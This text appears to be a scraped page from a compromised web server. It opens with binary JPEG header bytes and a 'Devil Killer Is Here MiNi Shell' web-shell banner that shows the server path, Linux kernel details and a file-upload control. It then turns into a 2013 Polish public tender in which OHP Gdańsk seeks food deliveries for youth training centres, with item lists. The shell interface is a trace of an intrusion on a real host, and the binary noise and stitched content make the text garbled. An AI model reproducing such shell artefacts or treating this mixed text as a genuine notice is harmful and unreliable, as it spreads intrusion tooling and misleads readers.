JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131011/413902-N-2013.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM  w 2014 r.</b><br>
<b>Numer ogłoszenia: 413902 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/   http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM  w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -UWAGA WAŻNE !!! Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
-UWAGA WAŻNE !!! Pełnomocnictwo do reprezentowania wykonawcy musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
-UWAGA WAŻNE !!! Niedopuszczalne jest zmienianie asortymentu w formularzach cenowych np. wpisywanie asortymentów o innej gramaturze, innej ilości,  itp. 
Dokonanie wszelkich zmian  w formularzach cenowych będzie skutkowało odrzuceniem oferty wykonawcy na podstawie art. 89 ust 1 pkt. 2 uPzP. 
-Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych na potrzeby Rejonowego Ośrodka Szkolenia Zawodowego Młodzieży  od 1 stycznia 2014 r.  do dnia 31 grudnia 2014 roku do: 
-Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4
zadania od 15 do 31.
-Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 
zadania od 1 do 14.
-Przedmiot zamówienia podzielonego na trzydzieści jeden  zadań częściowych:
TCZEW  -ZADANIA 1-14 
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 -pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 -produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje   
CZŁUCHÓW ZADANIA 15-31
Zadanie nr 15 - owoce świeże 
Zadanie nr 16 - owoce przetworzone  
Zadanie nr 17 - warzywa świeże 
Zadanie nr 18 - warzywa przetworzone 
Zadanie nr 19 - mrożonki 
Zadanie nr 20 - jaja
Zadanie nr 21 - mięso i produkty mięsne 
Zadanie nr 22 - drób 
Zadanie nr 23 - wędliny i prod. wędliniarskie
Zadanie nr 24 - pasztety i konserwy  
Zadanie nr 25 - rybi i przetwory  
Zadanie nr 26- pieczywo i ciasto 
Zadanie nr 27 - produkty skrobi  
Zadanie nr 28 - produkty spożywcze różne. 
Zadanie nr 29- oleje i tłuszcze roślinne  
Zadanie nr 30 - produkty mleczarskie 
Zadanie nr 31 - napoje 
-Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do: 
-Ośrodka Szkolenia i Wychowania w Tczewie , ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 1 DO 14. 

-Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 15 DO 31. 
-Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
-Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
-Cykliczne dostawy  będą realizowane jak następuje:  
-Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
-Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
-Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
-Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
-Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie. Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia.
-W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
-Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
-Do składania zamówień Zamawiający upoważni wybranego pracownika.
-Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
-W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
-Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
-Wykonawca ma obowiązek wystawiać każdorazowo faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
-Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia.
-Wartość brutto w formularzach cenowych należy wyliczać według wzoru:
ilość x cena netto + kwota VAT..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 03.14.25.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.10-9, 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.
12.1	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp należy:
-złożyć oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 Pzp, wg wzoru na załączniku  do SIWZ. 
-wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy  kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 uPzP , tj. w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331 z późn. zm.).   albo informację o tym, że nie należy do grupy kapitałowej.
12.2	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp, do oferty należy dołączyć:
-oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, w związku z art. 44 ustawy Pzp, wzór oświadczenia stanowi załączniku do SIWZ.
12.3	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu: pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału).
12.4	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.
12.5	Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów według formuły spełnia -nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
12.6	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
-Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
-Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
-Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
-Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
-Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
-określenie zasad reprezentacji i odpowiedzialności w sposób czytelny, nie budzący żadnej wątpliwości;
-określenie celu gospodarczego;
-oznaczenie czasu trwania konsorcjum obejmującego okres realizacji  przedmiotu zamówienia i okres gwarancji;
-wykluczenie możliwości wypowiedzenia umowy przez któregokolwiek z jej członków do czasu wykonania zamówienia bez zgody Zamawiającego i upływu  okresu gwarancji;
-zakaz dokonywania zmian w umowie bez zgody Zamawiającego.
- Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów wg formuły spełnia/nie spełnia w oparciu o informacje zawarte w oświadczeniach wyszczególnionych w pkt. 12  niniejszej SIWZ.  Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
-Wykonawcy, występujący wspólnie składają jedną ofertę, przy czym:
-Załącznik do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-Załącznik do SIWZ (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
-Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
-W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
-Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
-Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
-W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorska.ohp.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 10:15, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
(sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	5
arbuz	kg	20
banany	kg	30
brzoskwinie	kg	15
cytryny	kg	10
gruszki	kg	10
jabłka	kg	50
kiwi	kg	5
maliny	kg	3
mandarynki	kg	20
nektaryny	kg	20
pomarańcze	kg	20
rabarbar	kg	10
śliwka	kg	15
truskawki	kg	12
winogrona ciemne	kg	10
winogrona jasne	kg	17
wiśnie	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany puszka 400-450 ml	szt	20
brzoskwinia konserwowa puszka 900 ml	szt	30
Dżem  słoik 220-260ml	szt	50
kompot truskawkowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	2
rodzynki suszone 0.5 kg	szt	3
rodzynki suszone 100g	szt	30
sok owocowy 1l karton	szt	10
sok owocowy 2l karton	szt	20
syrop owocowy 1l 	szt	30
syrop owocowy 5 l 	szt	10
śliwki suszone 250g	szt	10
żurawina 220-260 ml	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuł	szt	20
burak	kg	130
cebula	kg	100
cebula czerwona 	kg	6
czosnek	szt	30
fasola drobna 0,5 kg	szt	30
fasola jaś	kg	10
fasola jaś 0,5kg	szt	10
fasola szparagowa	kg	7
groch łuska	kg	20
kalafior	szt	40
kapusta 	kg	60
kapusta czerwona	kg	5
kapusta młoda 	szt	17
kapusta pekińska	szt	30
koper	szt	100
